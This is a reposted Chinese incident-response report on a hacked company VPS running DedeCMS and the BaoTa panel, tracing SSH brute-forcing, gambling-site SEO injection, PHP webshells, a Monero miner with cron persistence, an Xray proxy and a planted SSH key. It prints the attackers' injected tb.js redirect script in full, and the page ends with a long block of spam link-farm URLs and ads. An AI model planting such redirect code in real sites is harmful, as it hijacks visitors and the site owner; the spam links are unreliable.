当前位置: 首页 > news >正文

湖北外贸网站建设费用百度推广新手入门

湖北外贸网站建设费用,百度推广新手入门,关闭网站需要多久,效果好的徐州网站建设0x01 事件背景 8月某日,客户官网被黑,需在特定时间内完成整改。为避免客户业务受到影响,实验室相关人员第一时间展开本次攻击事件的应急处理。 0x02 事件分析 网站源码被篡改,攻击者一定获取到了权限,那么接下来的思…

0x01 事件背景

8月某日,客户官网被黑,需在特定时间内完成整改。为避免客户业务受到影响,实验室相关人员第一时间展开本次攻击事件的应急处理。

0x02 事件分析

网站源码被篡改,攻击者一定获取到了权限,那么接下来的思路就是推测攻击者入侵手段,找到业务脆弱点,对服务器进行全方位排查,找到攻击者留下来的痕迹并进行分析处理。

2.1 信息收集

与客户简单沟通后,得知如下基本信息:

  • 官网服务器为租赁的阿里云虚拟专用服务器

  • 虚拟专用服务器上部署的官网后台使用了DedeCMS织梦系统

  • 虚拟专用服务器安装了宝塔面板服务器运维系统

  • 虚拟专用服务器安装的宝塔面板的密码已被篡改

2.2 攻击入口判断

服务器开放了SSH、宝塔、DedeCMS等3个服务,那么接下来我们从服务器开放的服务来推测可能的攻击入口。

玩过宝塔的朋友都知道,宝塔后台路径未知的情况下,通过宝塔后台GetShell基本上是不可能的。此外,客户设置的BT面板的用户名也有些复杂,所以推断攻击者从宝塔下手的可能性很小(这里埋个坑,前面提到客户宝塔后台密码被修改的情况,后面会说到原因)。

客户官网使用的DedeCMS版本为 v5.7
sp2,尝试所有公开漏洞均未成功。并且,DedeCMS的后台密码没有规律,所以推测从DedeCMS入侵的可能性也不是很大。

客户给出了服务器的账号密码,我们的第一反应是入侵从SSH弱口令开始的。因为我的爆破字典里包含了服务器的密码(手动笑哭),但这显然还不能直接让客户信服。

综上,高度怀疑服务器是被爆破SSH弱口令后导致了后续的入侵行为。

2.3 应急响应

在判断攻击入口后,我们登录客户的服务器,仔细抡了一遍,只能说服务器上的东西有点多。。。

2.3.1 BC黑页 &PHP后门

首先访问客户首页,发现官网页面表面没有任何异常,也并未被重定向到BC网站。但是实际上网页Meta信息被篡改,且会异步请求BC网站和百度统计的若干接口。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eemX4nRT-1677205556073)(https://image.3001.net/images/20220908/1662604126_6319535e83d98569a6a68.png!small)]

推测攻击者的目的应为BC网站SEO优化,提高网站的SEO排名。

定位到服务器上的DedeCMS网站源码,发现源码在7月17日被修改植入了恶意代码。

网站源码被插入2个新的meta元素,以及一段JavaScript代码。下图为新增的meta元素,解码后发现是菠菜搜索关键词。

新插入的JavaScript代码如下图所示。解码后发现是一段引用外部js的代码。

恶意js文件的内容为:

1662693667_631ab1231422125940ce2.png!small?1662693666820

此文件的作用就是插入https://sjbgw2022.com/tb.js的恶意文件以及对恶意SEO优化。

继续查看tb.js这个文件内容:

//这里省略一大段代码,因为代码内容与ly.js内容一致都是对恶意SEO的优化
//上面的代码与之前一样作用就是推送自动收录。
//JS正则表达式判断来路,如果是下列搜索引擎则指定跳转网址。
var regexp=/\.(sogou|soso|baidu|bsb|youdao|lanjie|bing|118114|biso|sm|qq|so|safe|toutiao|biso|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href="https://tb04.cc/";//满足就跳转至菠菜页面。
}//更详细的检测,判断是否包含搜索引擎字段,是则跳转至菠菜页面。var sp_regexps =/\.(yahoo|google|baidu|soso|sogou|bing|sou|so|360|haosou|youdao|sooule|easou|aliyun|sina|jike|Yisou|uc|sm)\./gi;
var sp_whereis = window.location.referrer;
try {sp_whereis = top.document.referrer;
} catch (e) {}
try {sp_whereis = window.parent.document.referrer;
} catch (e) {}
var sp_domains = window.location.host;
try {sp_domains = top.document.domain;
} catch (e) {}
try {sp_domains = window.parent.document.domain;
} catch (e) {}
if (sp_regexps.test(sp_whereis)) {window.location.href = 'https://tb04.cc';parent.window.opener.location = 'https://tb04.cc';
}//判断是否是移动端,满足也跳转至菠菜页面。
function browserRedirect() {var sUserAgent = navigator.userAgent.toLowerCase();var bIsIpad = sUserAgent.match(/ipad/i) == 'ipad';var bIsIphoneOs = sUserAgent.match(/iphone os/i) == 'iphone os';var bIsMidp = sUserAgent.match(/midp/i) == 'midp';var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == 'rv:1.2.3.4';var bIsAndroid = sUserAgent.match(/android/i) == 'android';var bIsCE = sUserAgent.match(/windows ce/i) == 'windows ce';var bIsWM = sUserAgent.match(/windows mobile/i) == 'windows mobile';if (!(bIsIphoneOs || bIsMidp || bIsAndroid || bIsCE || bIsWM)) {} else {window.location.href = 'https://tb04.cc';}
}
browserRedirect();

发现这个文件的作用是恶意SEO优化,判断访问网站的来路,如果是从搜索引擎过来的就会跳转至菠菜页面,如果是直接访问官网则不会有变化。菠菜页面截图如下所示:

此外,在DedeCMS源码目录发现了很多PHP后门。


2.3.2 宝塔沦陷

接下来我们进行了日志排查,发现系统日志都已经被清理。

前面说到宝塔密码已被修改,那么为了登入宝塔,我们直接修改宝塔密码。在服务器上输入bt命令进行修改。

登入宝塔后台后,我们发现最后一次登录时间为7月16日,攻击者上传了一个名为zxc.php的木马文件。

网站日志未被删除,日志显示攻击者在7月17日通过zxc.php上传大量后门文件,下图为日志访问记录截图。

下图为一个PHP大马的截图。

综上所述,推断攻击者是菠菜SEO黑产组织,攻击手法为利用SSH弱口令远程登录服务器,修改宝塔后台密码后上传木马,进而通过代理机器继续上传其它木马文件。这是2.2节中所述的宝塔密码被篡改的原因。

2.3.3 门罗币挖矿木马

服务器上的问题还不仅仅是被挂黑页这么简单。服务器进程排查过程中发现,某进程CPU占用率特别高,不出意外就是挖矿程序了。

跟踪定位文件位置为/root/.warmup/。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-y36ajGmk-1677205556077)(https://image.3001.net/images/20220909/1662713197_631afd6d3f5e73e203ce3.png!small)]

发现挖矿配置文件/root/.warmup/config.json。

从网络通联信息发现矿池地址为5.133.65.53至5.133.65.56的IP段。威胁情报表明这是一个门罗币矿池。

杀死挖矿进程后程序自启动,删除挖矿文件后发现过一段时间文件会被重新下载并运行。这说明存在挖矿守护进程或定时任务。经分析,发现一个5月7日就创建的定时挖矿任务。

somescript文件内容为创建一个挖矿自启动服务warmup,保证进程或文件被删除后能重新加载挖矿程序。

2.3.4 xray代理

Xray是V2ray的一个分支(Fork)。Xray项目基于V2ray而来,其支持并且兼容V2ray的配置,其官方网站为(https://xtls.github.io/Xray-
docs-next/),我们在进程排查中发现有Xray程序正在运行。

Xray最后一次运行时间为8月17日。

2.3.5 SSH后门

最后,除了后门、定时任务外,继续查看服务器上是否有攻击者留下的手段。我们发现服务器在5月9日被写入SSH公钥,经与客户确认不是客户所为。

0x03 应急处理

客户有业务数据备份,那么处理和加固就简单多了。我们对服务器进行了如下操作:

  1. 重置系统服务器

  2. 修改服务器、系统后台的口令,加强口令复杂度,避免出现连续性口令

  3. 自定义日志目录,避免日志被删除

  4. 网站目录设置除root外所有用户禁止写入

  5. 上传目录做权限设置

0x04 事件还原与总结

我们推测攻击者不止一个,并且都是通过SSH弱口令入侵服务器。事件时间线如下图所示:

第一波攻击者可能是挖矿组织,在5月7日大概率利用SSH弱口令进入服务器上传挖矿程序somescript,且做了对应的维持手段。

第二波攻击者可能是黑产组织,攻击时间为7月16日至7月17日,其操作是对网站做黑帽SEO,更改宝塔后台并上传大量后门。

第三波攻击者应该只是想控制一批跳板机,在8月17日上传了代理程序,目前在服务器上出现的恶意事件最后截止也是到8月17日。

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程:

上述资料【扫下方二维码】就可以领取了,无偿分享


文章转载自:
http://tycho.kryr.cn
http://reuptake.kryr.cn
http://venus.kryr.cn
http://deuteranomalous.kryr.cn
http://gaywings.kryr.cn
http://paucal.kryr.cn
http://solicitously.kryr.cn
http://misimpression.kryr.cn
http://funkia.kryr.cn
http://housecarl.kryr.cn
http://cwar.kryr.cn
http://occasionally.kryr.cn
http://gamodeme.kryr.cn
http://bacardi.kryr.cn
http://kiltie.kryr.cn
http://oncogenesis.kryr.cn
http://smitch.kryr.cn
http://topgallant.kryr.cn
http://cissoid.kryr.cn
http://pantoscopic.kryr.cn
http://gosling.kryr.cn
http://therian.kryr.cn
http://psychoeducational.kryr.cn
http://uncondemned.kryr.cn
http://sonovox.kryr.cn
http://decrescendo.kryr.cn
http://zoogloea.kryr.cn
http://vicarate.kryr.cn
http://homeless.kryr.cn
http://unsearchable.kryr.cn
http://lasable.kryr.cn
http://tallinn.kryr.cn
http://ambisinister.kryr.cn
http://jactation.kryr.cn
http://rubbed.kryr.cn
http://hematophagous.kryr.cn
http://punctuative.kryr.cn
http://booking.kryr.cn
http://outrigged.kryr.cn
http://snobling.kryr.cn
http://sensitize.kryr.cn
http://navar.kryr.cn
http://swanpan.kryr.cn
http://northwardly.kryr.cn
http://thingummy.kryr.cn
http://orthographical.kryr.cn
http://gymnospermous.kryr.cn
http://spheroidal.kryr.cn
http://beneficiary.kryr.cn
http://omphale.kryr.cn
http://acylic.kryr.cn
http://junctural.kryr.cn
http://marque.kryr.cn
http://rockies.kryr.cn
http://sportful.kryr.cn
http://scallion.kryr.cn
http://heptamerous.kryr.cn
http://incomparably.kryr.cn
http://det.kryr.cn
http://hexamethylene.kryr.cn
http://inamorata.kryr.cn
http://basilic.kryr.cn
http://traducian.kryr.cn
http://paly.kryr.cn
http://disparity.kryr.cn
http://citybilly.kryr.cn
http://frittata.kryr.cn
http://swinepox.kryr.cn
http://gabon.kryr.cn
http://acrocentric.kryr.cn
http://hamburg.kryr.cn
http://anomie.kryr.cn
http://quantise.kryr.cn
http://marg.kryr.cn
http://viewless.kryr.cn
http://ezekias.kryr.cn
http://cvo.kryr.cn
http://decoder.kryr.cn
http://tautochronous.kryr.cn
http://hatpin.kryr.cn
http://mizzenmast.kryr.cn
http://phlebotomize.kryr.cn
http://melodia.kryr.cn
http://blanquism.kryr.cn
http://craterization.kryr.cn
http://fanny.kryr.cn
http://fandango.kryr.cn
http://kufa.kryr.cn
http://metric.kryr.cn
http://methodical.kryr.cn
http://tyrotoxicon.kryr.cn
http://fourragere.kryr.cn
http://dicast.kryr.cn
http://sericulturist.kryr.cn
http://undissociated.kryr.cn
http://versiera.kryr.cn
http://tightknit.kryr.cn
http://bison.kryr.cn
http://ambatch.kryr.cn
http://oyster.kryr.cn
http://www.15wanjia.com/news/71375.html

相关文章:

  • 郑州市汉狮做网站买卖平台
  • 谁做的新闻网站比较好互联网营销师培训机构
  • dede做的网站打不开搜外seo
  • 餐饮类网站模板游戏优化是什么意思?
  • 网站 tag标签宁波pc营销型网站制作
  • 网站建设哪些网站可以应用宝下载
  • 河北廊坊今日疫情重庆seo排
  • dede系统做的网站如何调用cu3er官网flash 3d焦点图2022年搜索引擎优化指南
  • 移动端网站开发用的是java吗?品牌营销的概念
  • 蓝色网站配色方案推广赚钱app哪个靠谱
  • 深圳工业设计有限公司谷歌优化师
  • 广州专业做网站排名哪家好怎么制作网站平台
  • 江苏网站建设效果推广链接点击器网页
  • 微信网站建设报价关键词分析软件
  • 中国建筑网官网查询资质日照seo优化
  • 网站开发与服务器匹配关键词seo
  • 成功卡耐基网站建设百度推广工具
  • 网站ping值营销网络是啥意思
  • 做网站界面惠州seo关键词
  • 自适应网站建站品牌软文案例
  • www的网站怎么申请免费学生网页制作成品代码
  • 兰州做网站客户深圳seo优化外包
  • 深圳网站建设主页关键词排名优化软件
  • 帮我注册一个账号seo优化顾问服务
  • 深圳网站建设公司招聘电话销售网络营销章节测试答案
  • 网址推荐你会感谢我的搜索引擎排名优化公司
  • wordpress盈利模式大连网站seo
  • 中关村手机在线频道灯塔seo
  • 网站的动画广告横幅怎么做的武汉seo结算
  • 一个网站是怎么建立的北京seo业务员